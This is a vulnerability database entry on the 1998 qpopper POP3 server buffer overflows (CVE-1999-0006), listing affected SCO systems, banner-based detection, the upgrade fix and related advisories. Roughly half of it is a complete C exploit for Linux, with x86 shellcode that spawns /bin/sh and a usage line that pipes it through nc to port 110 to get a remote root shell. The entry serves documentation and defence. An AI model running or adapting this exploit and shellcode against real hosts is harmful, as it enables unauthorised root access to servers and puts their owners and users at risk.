Qpopper Overflow

Vulnerability Description

Brief description: A number of buffer overflows exist in versions prior to 2.5 of Qualcomm's qpopper (1) program. This makes it possible for a remote user to execute arbitrary commands on hosts which are running a vulnerable version.

Full description: The vulnerability exists in the way qpopper handles user supplied input for a number of pop commands, including, but not limited to, USER, PASS, as well as any line containing in excess of 1024 characters.

Components: qpopper 2.4 and below (trusted), qpopper 2.5beta (trusted); versions 2.5 and later are not vulnerable

Systems: SCO OpenServer Releases 5.0.0; SCO OpenServer Releases 5.0.2; SCO OpenServer Releases 5.0.4; SCO Internet FastStart Releases 1.0; SCO Internet FastStart Releases 1.1; versions SCO UnixWare 7, SCO UnixWare 2.1, SCO CMW+, SCO Open Desktop / Open Server 3.0, and SCO UNIX 3.2v4 are not vulnerable

Effect(s) of exploiting: Attackers can induce qpopper to execute arbitrary commands.

Detecting the hole:

    1. Telnet to port 110 on the possibly vulnerable host. A banner should appear, informing you of the version of the pop server.

Fixing the hole:

    1. Upgrade to the latest version of qpopper ; available from Qualcomm at ftp://ftp.qualcomm.com/Eudora/servers/unix/popper

Other information:

Keywords

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CVE-1999-0006 -- Buffer overflow in POP servers based on BSD/Qualcomm's qpopper allows remote attackers to gain root access using a long USER or PASS command.

Exploit Information

Attack: The following program is tweaked for Linux, and should result in a root prompt if the exploit is successful. 

/* Exploit for qpopper 2.4 (and others) for Linux
 *   by [WaR] (warchild@cryogen.com) and zav (zav@cryogen.com)
 *
 *  usage: (./qpopper <offset>;cat)|nc <victim> 110
 *       with offset around 1000 (try increments of 50)
 *
 *
 *    shout outs to: Zef and YZF
 */

#include <stdio.h>
#include <stdlib.h>

#define BUFFSIZE 998

char shell[] =
   "\xeb\x33\x5e\x89\x76\x08\x31\xc0"
   "\x88\x66\x07\x83\xee\x02\x31\xdb"
   "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
   "\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
   "\xee\x02\x8d\x5e\x0e\x89\xda\x83"
   "\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
   "\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
   "\xff\xff/bin/sh";

unsigned long esp()
{
  __asm__(" movl %esp,%eax ");
}

main(int argc, char **argv)
{
  int i,j,offset;
  unsigned long eip;
  char buffer[4096];

  j=0;
  offset=atoi(argv[1]);
  eip=esp()+offset;
  for(i=0;i<1008;i++) buffer[i]=0x90;
  for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++];

  i=1005;
  buffer[i]=eip & 0xff;
  buffer[i+1]=(eip >> 8) & 0xff;
  buffer[i+2]=(eip >> 16) & 0xff;
  buffer[i+3]=(eip >> 24) & 0xff;

  printf("%s\nsh -i\n",buffer);
}

Related Information

Advisories: Security Focus database entry 133 ; CERT Advisory CA-98.08 ; Silicon Graphics Security Advisory 19980801-01-I, BSD/Qualcomm qpopper Vulnerability ; CIAC Advisory I-069, Buffer overflows in some POP servers ; ISS X-Force qpopper-pass-overflow

Related Vulnerabilities:

Reportage

Reporting: Seth McGann (smm@WPI.EDU) in BugTraq message ID: 19980627050419750.AAA323.373@dell166 (Sat Jun 27 1998 00:58:24 )

Revision Number 1

  1. Homer Briggs (6/26/2000):
    Created entry